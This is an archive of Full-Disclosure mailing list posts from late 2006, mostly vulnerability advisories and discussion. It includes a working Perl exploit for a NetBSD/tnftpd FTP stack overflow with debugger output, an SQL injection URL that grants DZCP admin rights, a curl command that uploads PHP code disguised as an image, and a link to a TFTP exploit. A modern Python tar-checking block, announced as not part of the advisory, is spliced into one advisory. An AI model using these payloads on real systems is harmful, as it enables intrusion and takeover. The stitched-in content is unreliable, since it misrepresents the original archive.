From jammer128 at gmail.com  Fri Dec  1 00:19:23 2006
From: jammer128 at gmail.com (Jason Miller)
Date: Thu, 30 Nov 2006 18:19:23 -0600
Subject: [Full-disclosure] Nmap Online
In-Reply-To: <456BF10D.9080400@matousec.com>
References: <456BF10D.9080400@matousec.com>
Message-ID: <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com>

I'm detecting legal actions already.

On 11/28/06, David Matousek wrote:
>
> Hello,
>
> For all Nmap fans, our group have implemented Nmap Online service.
> Its address is http://nmap-online.com/. The interface allows you to
> perform custom
> Nmap scans from our server with only a few limitations in the syntax.
> The service is free and can be used immediately, no registration is
> required.
>
> Please direct your questions and suggestions to our emails.
>
>
> Regards,
>
> --
> David Matousek
>
> Founder and Chief Representative of Matousec - Transparent security
> http://www.matousec.com/
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061130/4be1a282/attachment.html

From zdi-disclosures at 3com.com  Fri Dec  1 00:27:41 2006
From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com)
Date: Thu, 30 Nov 2006 16:27:41 -0800
Subject: [Full-disclosure] ZDI-06-043: Novell Netware Client Print Provider Buffer Overflow Vulnerability
In-Reply-To:
Message-ID:

Thanks for pointing this out JP, it does in fact look confusing. We
determined during the Digital Vaccine filter creation process that a
previously released filter was robust enough to block the attack without
further modification and the vendor was immediately notified.

ZDI Team


"Dude VanWinkle"
11/30/2006 05:02 AM

To
zdi-disclosures/F/US/3Com at 3Com
cc
full-disclosure at lists.grok.org.uk, bugtraq at securityfocus.com
Subject
Re: [Full-disclosure] ZDI-06-043: Novell Netware Client Print Provider Buffer Overflow Vulnerability

On 11/29/06, zdi-disclosures at 3com.com wrote:
> ZDI-06-043: Novell Netware Client Print Provider Buffer Overflow
> Vulnerability
> http://www.zerodayinitiative.com/advisories/ZDI-06-043.html
> November 29, 2006
> -- Disclosure Timeline:
> 2005.07.07 - Digital Vaccine released to TippingPoint customers
> 2006.10.02 - Vulnerability reported to vendor
> 2006.11.29 - Coordinated public release of advisory

you waited over a year to report it to the vendor?

sounds like analyzing your digital vaccine rules might yield a slew of
reproducible 0 days that vendors are unaware of.....

-JP

From kingcope at gmx.net  Fri Dec  1 00:25:14 2006
From: kingcope at gmx.net (kcope)
Date: Fri, 01 Dec 2006 01:25:14 +0100
Subject: [Full-disclosure] NetBSD FTPD and ports ***REMOTE ROOOOOT HOLE***
Message-ID: <20061201002514.196150@gmx.net>

LAMERZ!!!!!
KEEP ON HACKING!!! KEEP THAT *FUCK*ING PRIVATE!!!

Greetings to the elite guys, thank you for your time.

signed,
***eliteboy***

$$$ NetBSD ftpd and ports *Remote ROOOOOT $HOLE$* $$$

About

tnftpd is a port of the NetBSD FTP server to other systems.
It offers many enhancements over the traditional BSD ftpd,
including per-class configuration directives via ftpd.conf(5),
RFC 2389 and draft-ietf-ftpext-mlst-11 support, IPv6,
transfer rate throttling, and more.
tnftpd was formerly known as lukemftpd,
and earlier versions are present in Mac OS X 10.2 (as ftpd)
and FreeBSD 5.0 (as lukemftpd).

Description

The NetBSD ftpd and the tnftpd port suffer from a remote stack overrun,
which can lead to a root compromise.

The bug is in glob.c file. The globbing mechanism is flawed as back in
2001.

To trigger the overflow you can create a folder and use the globbing
special characters (like STARS) to overflow an internal stack based buffer.

Example PoC:
---snip---
use IO::Socket;

$sock = IO::Socket::INET->new(PeerAddr => '192.168.2.10',
                              PeerPort => '21',
                              Proto => 'tcp');
$c = "C";
$a = "C" x 255;
$d = "A" x 450;

print $sock "USER kcope\r\n";
print $sock "PASS remoteroot\r\n";
$x = ;
print $sock "MKD $a\r\n";
print $sock "NLST C*/../C*/../C*/../$d\r\n";
print $sock "QUIT\r\n";

while (<$sock>) {
        print;
}
---snip---

gdb output tested on NetBSD 3.0 i386 NetBSD-ftpd 20050303 :
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x00410041 in ?? ()
(gdb)

tnftpd-20040810 behaves similar.
FreeBSD (lukemftpd) and MacOSX (ftpd) were not tested,
however they could have the same bug, because of the same
codebase.

The problem when exploiting this kind of bug is,
that we can only control 0x00410041, not the whole
32 bit. However it looks feasible to find a way
to do a hole EIP redirection and/or exploit
the bug the "unicode" way, which could be especially
hard on BSD systems.

From kf_lists at digitalmunition.com  Fri Dec  1 01:17:23 2006
From: kf_lists at digitalmunition.com (K F (lists))
Date: Thu, 30 Nov 2006 20:17:23 -0500
Subject: [Full-disclosure] NetBSD FTPD and ports ***REMOTE ROOOOOT HOLE***
In-Reply-To: <20061201002514.196150@gmx.net>
References: <20061201002514.196150@gmx.net>
Message-ID: <456F82A3.40001@digitalmunition.com>

I can confirm that this bug is present on OSX 10.3.9 at the very least.
lukemftpd-20040810 is the version this was tested against.

I am fairly sure that this issue was patched recently in: Security Update 2006-003 * *FTPServer* CVE-ID: CVE-2006-1445 Available for: Mac OS X v10.3.9, Mac OS X Server v10.3.9, Mac OS X v10.4.6, Mac OS X Server v10.4.6 Impact: FTP operations by authenticated FTP users may lead to arbitrary code execution Description: Multiple issues in FTP server path name handling could result in a buffer overflow. A malicious authenticated user may be able to trigger this overflow which may lead to arbitrary code execution with the privileges of the FTP server. This update adresses the issue by properly handling the boundary conditions. ftp> o localhost Trying ::1... Connected to localhost. 220 localhost FTP server (tnftpd 20040810) ready. Name (localhost:kevinf): 331 Password required for kevinf. Password: 230- Welcome to Darwin! 230 User kevinf logged in. Remote system type is UNIX. Using binary mode to transfer files. ftp> mkdir CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC 550 CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC: File exists. ftp> ls C*/../C*/../C*/../AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 229 Entering Extended Passive Mode (|||49225|) 421 Service not available, remote server timed out. 
Connection closed
ftp>

kevin-fs-Computer:/cores kevinf$ sudo gdb -q /usr/libexec/ftpd 425
Password:
Reading symbols for shared libraries ... done
/cores/425: No such file or directory.
Attaching to program: `/usr/libexec/ftpd', process 425.
Reading symbols for shared libraries ........... done
0x9000ed44 in read ()
(gdb) c
Continuing.

Program received signal EXC_BAD_ACCESS, Could not access memory.
0x00410040 in ?? ()
(gdb) bt
#0  0x00410040 in ?? ()
Cannot access memory at address 0x410040
Cannot access memory at address 0x410041
#1  0x00000000 in ?? ()
(gdb)

kevin-fs-Computer:/Volumes/HARD DISK kevinf$ ps -aux -ocommand,svuid,svgid,ruid,rgid,uid,gid | grep ftpd
kevinf 425 0.0 0.3 28072 820 ?? SXs 8:02PM 0:00.05 0 0 0 0 501 501 ftpd -l

This could be fun on x86 machines.... good luck on powerpc however.

Thanks for the excuse to finish my OSX Unicode research!

-KF

kcope wrote:
> LAMERZ!!!!!
> KEEP ON HACKING!!! KEEP THAT *FUCK*ING PRIVATE!!!
>
> Greetings to the elite guys, thank you for your time.
>
> signed,
> ***eliteboy***
>
> $$$ NetBSD ftpd and ports *Remote ROOOOOT $HOLE$* $$$
>
> About
>
> tnftpd is a port of the NetBSD FTP server to other systems.
> It offers many enhancements over the traditional BSD ftpd,
> including per-class configuration directives via ftpd.conf(5),
> RFC 2389 and draft-ietf-ftpext-mlst-11 support, IPv6,
> transfer rate throttling, and more.
> tnftpd was formerly known as lukemftpd,
> and earlier versions are present in Mac OS X 10.2 (as ftpd)
> and FreeBSD 5.0 (as lukemftpd).
>
> Description
>
> The NetBSD ftpd and the tnftpd port suffer from a remote stack overrun,
> which can lead to a root compromise.
>
> The bug is in glob.c file. The globbing mechanism is flawed as back in
> 2001.
>
> To trigger the overflow you can create a folder and use the globbing
> special characters (like STARS) to overflow an internal stack based buffer.
> Example PoC:
> ---snip---
> use IO::Socket;
>
> $sock = IO::Socket::INET->new(PeerAddr => '192.168.2.10',
> PeerPort => '21',
> Proto => 'tcp');
> $c = "C";
> $a = "C" x 255;
> $d = "A" x 450;
>
> print $sock "USER kcope\r\n";
> print $sock "PASS remoteroot\r\n";
> $x = ;
> print $sock "MKD $a\r\n";
> print $sock "NLST C*/../C*/../C*/../$d\r\n";
> print $sock "QUIT\r\n";
>
> while (<$sock>) {
> print;
> }
> ---snip---
>
> gdb output tested on NetBSD 3.0 i386 NetBSD-ftpd 20050303 :
> (gdb) c
> Continuing.
>
> Program received signal SIGSEGV, Segmentation fault.
> 0x00410041 in ?? ()
> (gdb)
>
>
>
>
> tnftpd-20040810 behaves similar.
> FreeBSD (lukemftpd) and MacOSX (ftpd) were not tested,
> however they could have the same bug, because of the same
> codebase.
>
> The problem when exploiting this kind of bug is,
> that we can only control 0x00410041, not the whole
> 32 bit. However it looks feasible to find a way
> to do a hole EIP redirection and/or exploit
> the bug the "unicode" way, which could be especially
> hard on BSD systems.
>
>

From dudevanwinkle at gmail.com  Fri Dec  1 01:52:25 2006
From: dudevanwinkle at gmail.com (Dude VanWinkle)
Date: Thu, 30 Nov 2006 20:52:25 -0500
Subject: [Full-disclosure] ZDI-06-043: Novell Netware Client Print Provider Buffer Overflow Vulnerability
In-Reply-To:
References:
Message-ID:

On 11/30/06, zdi-disclosures at 3com.com wrote:
> Thanks for pointing this out JP, it does in fact look confusing. We
> determined during the Digital Vaccine filter creation process that a
> previously released filter was robust enough to block the attack without
> further modification and the vendor was immediately notified.

NP, I would clarify that in future notifications. i.e.: "tippingpoint
customers have been protected from attacks of this kind since xyz date
by GenericFilterX". Then you could list the time lines for
discovered/acquired, vendor notification, patch released from vendor,
and finally; public disclosure.

-JP

From security at mandriva.com  Fri Dec  1 02:18:01 2006
From: security at mandriva.com (security at mandriva.com)
Date: Thu, 30 Nov 2006 19:18:01 -0700
Subject: [Full-disclosure] [ MDKSA-2006:220 ] - Updated libgsf packages fix heap buffer overflow vulnerability
Message-ID:

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDKSA-2006:220
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : libgsf
 Date    : November 30, 2006
 Affected: 2007.0, Corporate 3.0
 _______________________________________________________________________

 Problem Description:

 "infamous41md" discovered a heap buffer overflow vulnerability in
 libgsf, a GNOME library for reading and writing structured file
 formats, which could lead to the execution of arbitrary code.

 The updated packages have been patched to correct this problem.
 _______________________________________________________________________

 References:

 http://www.debian.org/security/2006/dsa-1221
 _______________________________________________________________________

 Updated Packages:
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi. The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security. You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team

From security at mandriva.com  Fri Dec  1 03:29:01 2006
From: security at mandriva.com (security at mandriva.com)
Date: Thu, 30 Nov 2006 20:29:01 -0700
Subject: [Full-disclosure] [ MDKSA-2006:221 ] - Updated gnupg packages fix vulnerability
Message-ID:

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDKSA-2006:221
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : gnupg
 Date    : November 30, 2006
 Affected: 2006.0, 2007.0, Corporate 3.0, Corporate 4.0,
           Multi Network Firewall 2.0
 _______________________________________________________________________

 Problem Description:

 Buffer overflow in the ask_outfile_name function in openfile.c for
 GnuPG (gpg) 1.4 and 2.0, when running interactively, might allow
 attackers to execute arbitrary code via messages that cause the
 make_printable_string function to return a longer string than expected
 while constructing a prompt.

 Updated packages have been patched to correct this issue.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6169
 _______________________________________________________________________

 Updated Packages:
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi. The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security. You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team

From tonnerre.lombard at sygroup.ch  Fri Dec  1 07:47:13 2006
From: tonnerre.lombard at sygroup.ch (Tonnerre Lombard)
Date: Fri, 01 Dec 2006 08:47:13 +0100
Subject: [Full-disclosure] SSH brute force blocking tool
In-Reply-To: <456C6AFF.3060004@infiltrated.net>
References: <456B3AE2.9070708@infiltrated.net> <20061127203433.GC6620@sdf.lonestar.org> <1638869788.20061128152124@Zoller.lu> <456C489F.4020105@infiltrated.net> <20061128154219.GA31705@sdf.lonestar.org> <456C5C31.4000002@infiltrated.net> <20061128160236.GB31705@sdf.lonestar.org> <20061128161621.GC31705@sdf.lonestar.org> <456C6AFF.3060004@infiltrated.net>
Message-ID: <1164959233.39297.35.camel@aspirateur.sygroup-int.ch>

Salut,

On Tue, 2006-11-28 at 11:59 -0500, J. Oquendo wrote:
> Nov 27 16:31:21 local sshd[67010]: Illegal user dd from 213.134.128.227
> awk '($5=="Illegal"||$6=="Illegal")&&$9=="from"{print $10}'

What if I set my user name to "bikermice from mars"? Are you going to
blacklist mars then?

				Tonnerre
-- 
SyGroup GmbH
Tonnerre Lombard

Solutions Systematiques
Tel:+41 61 333 80 33		Roeschenzerstrasse 9
Fax:+41 61 383 14 67		4153 Reinach BL
Web:www.sygroup.ch		tonnerre.lombard at sygroup.ch
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 825 bytes
Desc: This is a digitally signed message part
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061201/8c8b5788/attachment.bin

From dante at alighieri.org  Fri Dec  1 08:47:00 2006
From: dante at alighieri.org (Davide Del Vecchio)
Date: Fri, 01 Dec 2006 09:47:00 +0100
Subject: [Full-disclosure] 3Com TFTP Service <= 2.0.1 (Long Transporting Mode) Overflow Exploit
Message-ID: <20061201084700.1146.qmail@webmaild.fe1.aruba.it>

Hello list,

this is a poc exploit for 3Com TFTP Service <= 2.0.1 (Long Transporting
Mode) Overflow Exploit written by Cthulhu

http://www.crazybinary.org/exploits/3comftp_xpsp2.rb

Enjoy it,

Davide Del Vecchio & Michele Tumolo (Cthulhu).

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Davide Del Vecchio "Dante Alighieri"
dante at alighieri.org
http://www.alighieri.org
http://legaest.blogspot.com
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

From michael.huber at gmail.com  Fri Dec  1 08:13:38 2006
From: michael.huber at gmail.com (Mike Huber)
Date: Fri, 1 Dec 2006 03:13:38 -0500
Subject: [Full-disclosure] Nmap Online
In-Reply-To: <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com>
References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com>
Message-ID:

first of all, IANAL, but the TOS seem to cover the basics... However, I am
unsure whether they would hold up under strict legal scrutiny. As far as I
can tell, they may hold up under US criminal law, but not under civil law,
as tort law has its own wonderful little eccentricities. The best safeguard
they seem to have is that they must log the source IP of all scan
requests...
As far as I know, anyone who takes the time to read the nmap man
page should be able to craft a scan which won't be detected by the scanned
host (can someone be a definitive source on this point?), and anyone taking
malicious action ought to be taking sufficient precautions to avoid
detection anyway.

None-the-less, my 8-ball sees litigation in their future.

On 11/30/06, Jason Miller wrote:
>
> I'm detecting legal actions already.
>
> On 11/28/06, David Matousek wrote:
> >
> > Hello,
> >
> > For all Nmap fans, our group have implemented Nmap Online service.
> > Its address is http://nmap-online.com/. The interface allows you to
> > perform custom
> > Nmap scans from our server with only a few limitations in the syntax.
> > The service is free and can be used immediately, no registration is
> > required.
> >
> > Please direct your questions and suggestions to our emails.
> >
> >
> > Regards,
> >
> > --
> > David Matousek
> >
> > Founder and Chief Representative of Matousec - Transparent security
> > http://www.matousec.com/
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061201/27f4c92f/attachment.html

From announce-noreply at rpath.com  Fri Dec  1 03:40:00 2006
From: announce-noreply at rpath.com (rPath Update Announcements)
Date: Thu, 30 Nov 2006 22:40:00 -0500
Subject: [Full-disclosure] rPSA-2006-0220-1 dovecot
Message-ID: <456fa410.x1FK2H34l0MlWBaT%announce-noreply@rpath.com>

rPath Security Advisory: 2006-0220-1
Published: 2006-11-30
Products: rPath Linux 1
Rating: Minor
Exposure Level Classification:
    Local Deterministic Denial of Service
Updated Versions:
    dovecot=/conary.rpath.com at rpl:devel//1/1.0.beta8-4.2-1

References:
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5973
    https://issues.rpath.com/browse/RPL-802

Description:
    Previous versions of the dovecot package are vulnerable to a denial
    of service attack only in a non-default configuration, and only by
    authenticated users in that configuration.

From announce-noreply at rpath.com  Fri Dec  1 03:43:57 2006
From: announce-noreply at rpath.com (rPath Update Announcements)
Date: Thu, 30 Nov 2006 22:43:57 -0500
Subject: [Full-disclosure] rPSA-2006-0221-1 openldap openldap-clients openldap-servers
Message-ID: <456fa4fd.mjZLbPK7jnGjCHNF%announce-noreply@rpath.com>

rPath Security Advisory: 2006-0221-1
Published: 2006-11-30
Products: rPath Linux 1
Rating: Major
Exposure Level Classification:
    Remote Deterministic Denial of Service
Updated Versions:
    openldap=/conary.rpath.com at rpl:devel//1/2.2.26-8.5-1
    openldap-clients=/conary.rpath.com at rpl:devel//1/2.2.26-8.5-1
    openldap-servers=/conary.rpath.com at rpl:devel//1/2.2.26-8.5-1

References:
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5779
    https://issues.rpath.com/browse/RPL-820

Description:
    Previous versions of the openldap package are vulnerable to a
    remote denial of service attack that causes the openldap daemon
    to crash. This vulnerability is understood not to enable any
    form of remote execution.

From announce-noreply at rpath.com  Fri Dec  1 03:46:14 2006
From: announce-noreply at rpath.com (rPath Update Announcements)
Date: Thu, 30 Nov 2006 22:46:14 -0500
Subject: [Full-disclosure] rPSA-2006-0222-1 tar
Message-ID: <456fa586.6BVDPdoZiyllr7wx%announce-noreply@rpath.com>

rPath Security Advisory: 2006-0222-1
Published: 2006-11-30
Products: rPath Linux 1
Rating: Severe
Exposure Level Classification:
    Indirect User Deterministic Vulnerability
Updated Versions:
    tar=/conary.rpath.com at rpl:devel//1/1.15.1-7.1-1

References:
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6097
    https://issues.rpath.com/browse/RPL-821

Description:
    Previous versions of the tar package are vulnerable to an attack
    in which unpacking an intentionally-malformed tar archive can
    overwrite arbitrary files to which the user running tar has
    write access. If the attacking user knows the name of a
    vulnerable binary file and overwrites it, this allows the
    attacker to place arbitrary code on the system which is likely
    to be run. If root is running tar, this includes any file on
    the system, which would elevate this to an indirect
    non-deterministic remote root unauthorized access vulnerability.
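
An added example, not part of the rPath advisory or of tar itself: a Python pre-extraction check that lists archive members which would write outside the destination directory, either directly (absolute path or `..`) or through a link created earlier in the same archive. It covers the general class of failure the advisory describes rather than the specific flaw behind CVE-2006-6097, whose mechanism the advisory does not give; the names `unsafe_members` and `build_sample` and the sample archive are constructed for illustration.

```python
import io
import posixpath
import tarfile


def _norm(path):
    """Normalise an archive path; return None if it leaves the archive root."""
    if path.startswith("/"):
        return None
    norm = posixpath.normpath(path)
    if norm == ".." or norm.startswith("../"):
        return None
    return norm


def unsafe_members(tar):
    """Return [(member_name, reason)] for members that must not be extracted.

    Policy (deliberately conservative):
      * member names that are absolute or climb out with '..' are rejected;
      * symlinks/hardlinks whose target leaves the root are rejected;
      * anything stored *below* a link that came from this archive is
        rejected, because the write would follow that link.
    """
    findings = []
    link_paths = set()  # normalised paths of links seen so far in this archive
    for member in tar.getmembers():
        name = _norm(member.name)
        if name is None:
            findings.append((member.name, "path escapes destination"))
            continue

        parts = name.split("/")
        parents = {"/".join(parts[:i]) for i in range(1, len(parts))}
        if parents & link_paths:
            findings.append((member.name, "written through a link from this archive"))
            continue

        if member.issym() or member.islnk():
            link_paths.add(name)
            # Symlink targets are relative to the link's directory,
            # hardlink targets are relative to the archive root.
            base = posixpath.dirname(name) if member.issym() else ""
            if _norm(posixpath.join(base, member.linkname)) is None:
                findings.append((member.name, "link target escapes destination"))
    return findings


def build_sample():
    """Build a small in-memory archive (constructed sample, not a real exploit)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        def add_file(name, data=b"x"):
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))

        def add_link(name, target):
            info = tarfile.TarInfo(name)
            info.type = tarfile.SYMTYPE
            info.linkname = target
            tar.addfile(info)

        add_file("docs/readme.txt")          # harmless
        add_file("../outside.txt")           # climbs out of the destination
        add_link("docs/cfg", "/etc")         # link pointing outside
        add_file("docs/cfg/motd")            # would be written through that link
        add_link("docs/latest", "readme.txt")  # harmless in-tree link
    buf.seek(0)
    return tarfile.open(fileobj=buf, mode="r")


if __name__ == "__main__":
    for member_name, reason in unsafe_members(build_sample()):
        print(f"REJECT {member_name}: {reason}")
```

Run the check before extraction and refuse the whole archive if it returns anything; unpacking as an unprivileged user into an empty directory limits what a missed case can overwrite.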

From announce-noreply at rpath.com  Fri Dec  1 03:48:29 2006
From: announce-noreply at rpath.com (rPath Update Announcements)
Date: Thu, 30 Nov 2006 22:48:29 -0500
Subject: [Full-disclosure] rPSA-2006-0224-1 gnupg
Message-ID: <456fa60d.GYk4A3QvAzgXP9D7%announce-noreply@rpath.com>

rPath Security Advisory: 2006-0224-1
Published: 2006-11-30
Products: rPath Linux 1
Rating: Minor
Exposure Level Classification:
    Indirect Non-deterministic Unauthorized Access
Updated Versions:
    gnupg=/conary.rpath.com at rpl:devel//1/1.4.5-1.1-1

References:
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6169
    https://issues.rpath.com/browse/RPL-826

Description:
    Previous versions of the gnupg package contain a weakness that
    may enable an attacker to create a malformed message that causes
    gnupg to crash or execute arbitrary code provided by the attacker.
    This weakness exists only in interactive mode; other applications
    which call gpg in batch mode are not susceptible.

From scy-adv at scytale.de  Fri Dec  1 09:00:32 2006
From: scy-adv at scytale.de (Tim Weber)
Date: Fri, 1 Dec 2006 10:00:32 +0100
Subject: [Full-disclosure] deV!L`z Clanportal - SQL Injection [061124a]
Message-ID: <200612011000.33083.scy-adv@scytale.de>

 / -[061124a]- \
| deV!L`z Clanportal - SQL Injection |
 \ /


S Y N O P S I S /
================='

-( access: remote    severity: high )-

An SQL injection has been found in deV!L`z Clanportal, which allows any
logged in user to grant herself admin privileges in the system.


B A C K G R O U N D /
====================='

deV!L`z Clanportal (short "DZCP") is a suite of PHP scripts that allow
anybody to create a feature-rich website for her online gaming clan.


A F F E C T E D   V E R S I O N S /
==================================='

verified on:         1.3.6
possibly vulnerable: <= 1.3.6
fixed in:            1.3.6.1


I M P A C T /
============='

The attacker gains admin privileges in DZCP and is thus able to create and
download a MySQL dump, upload files, post news, delete users etc.


P R E R E Q U I S I T I E S /
============================='

o the attacker needs to have a user account in the suite and be logged in
o php.ini directive "magic_quotes_gpc" has to be disabled


D E S C R I P T I O N /
======================='

sites/index.php is not escaping the $_GET['show'] parameter, leading to an
SQL injection. This can be used to pass any string to the $where parameter
in DZCP's page() function. page(), in turn, is not checking that parameter,
allowing a second SQL injection in an UPDATE statement on the "users" table
to change arbitrary attributes in the calling user's tuple, including the
"level" attribute, which, set to 4, grants the user administrator
privileges.


W O R K A R O U N D /
====================='

Some possibilities:

o Add a mysql_real_escape_string() around the $_GET parameter in the SQL
  query in sites/index.php.
o Remove sites/index.php or make it inaccessible.
o Quit using DZCP. I mean it! There are tons of other vulnerabilities just
  waiting to be exploited; some of them more severe than this one. IMHO,
  DZCP is just a chaotic bunch of vulnerabilities that, by some
  coincidence, happen to look like a clan portal.


P R O O F   O F   C O N C E P T /
================================='

Check if magic_quotes_gpc is enabled:

http:///sites/index.php?show='

If a MySQL error appears or the script dies, it is disabled.

Then:

http:///sites/index.php?show=-1'+%55NION+%53ELECT+1,+'Admin+Panel\',+level%3d4,+waffe%3d\'SQL+Injection',+2,+3,+'


T I M E L I N E  (CET) /
========================'

2006-11-23 23:05 started searching
        24  0:35 exploited
           14:20 advisory finished
           17:31 informed vendor that any user can get admin privileges
        25 23:00 full disclosure to vendor
        27 14:36 hotfix available on vendor website
     12-01 10:00 full disclosure to the general public


A B O U T   T H E   A U T H O R /
================================='

Tim Weber, computer science student at the University of Mannheim, Germany,
currently looking for an internship at some IT security or pentesting
company, can be reached via e-mail: scy-adv-061124a at the host scytale.de.


T H A N K S /
============='

o Kallista
o yorn for showing me DZCP and the basics of SQL injections
o the DZCP authors for the fun in secure.php

From scy-adv at scytale.de  Fri Dec  1 09:45:03 2006
From: scy-adv at scytale.de (Tim Weber)
Date: Fri, 1 Dec 2006 10:45:03 +0100
Subject: [Full-disclosure] deV!L`z Clanportal - Arbitrary File Upload [061124b]
Message-ID: <200612011045.03740.scy-adv@scytale.de>

 / -[061124b]- \
| deV!L`z Clanportal - Arbitrary File Upload |
 \ /


S Y N O P S I S /
================='

-( access: remote    severity: high )-

deV!L`z Clanportal allows nearly arbitrary files to be uploaded and stored
on the server's filesystem, which enables anyone, even without a user
account, to upload PHP code and execute it, leading to arbitrary code
execution.


B A C K G R O U N D /
====================='

deV!L`z Clanportal (short "DZCP") is a suite of PHP scripts that allow
anybody to create a feature-rich website for her online gaming clan.

A F F E C T E D   V E R S I O N S /
==================================='

verified on:          1.3.6
possibly vulnerable:  <= 1.3.6
fixed in:             1.3.6.1

I M P A C T /
============='

The attacker can run own code on the web server with the same privileges as DZCP itself, enabling her to do almost anything from getting the MySQL password to hosting own files and scripts or getting a shell on the server.

P R E R E Q U I S I T E S /
============================='

 o the attacker needs a file that is both a valid JPEG or GIF file and valid PHP (or probably other) code

D E S C R I P T I O N /
======================='

upload/index.php is not checking the file extension of uploaded files. Instead it is simply checking the MIME type (that can be spoofed) and the format of an uploaded image. A skilled attacker could upload an image file that has been specially crafted to contain PHP code and yet be recognized as a valid image. The file will be stored on the server, using a file name supplied by the attacker (ending in .php, for example), and can then be executed via HTTP.

W O R K A R O U N D /
====================='

Some possibilities:

 o Add something like this before the "switch" statement in upload/index.php:

       if (isset($_FILES['file']['name']) &&
           !preg_match('/\.(jpg|gif)$/i', $_FILES['file']['name']))
         die();

 o Remove upload/index.php or make it inaccessible.
 o Quit using DZCP. I mean it! There are tons of other vulnerabilities just waiting to be exploited; some of them might be as severe as this one. IMHO, DZCP is just a chaotic bunch of vulnerabilities that, by some coincidence, happen to look like a clan portal.

P R O O F   O F   C O N C E P T /
================================='

Get a JPEG file, open it in a hex editor, add some PHP inside the EXIF data or in similar places. Make sure PHP's getimagesize() does not return false and that the file does not throw parse errors or the like when fed to PHP.
Then:

    curl -F 'file=@img.php;type=image/jpeg' 'http:///upload/index.php?action=userpic&do=upload'

Then check http:///inc/images/uploads/userpics/.php

T I M E L I N E (CET) /
========================'

2006-11-24  2:00  started searching
            4:00  exploited
           15:05  advisory finished
           17:31  informed vendor that anybody can run arbitrary code
        25 23:00  full disclosure to vendor
        27 14:36  hotfix available on vendor website
     12-01 10:45  full disclosure to the general public

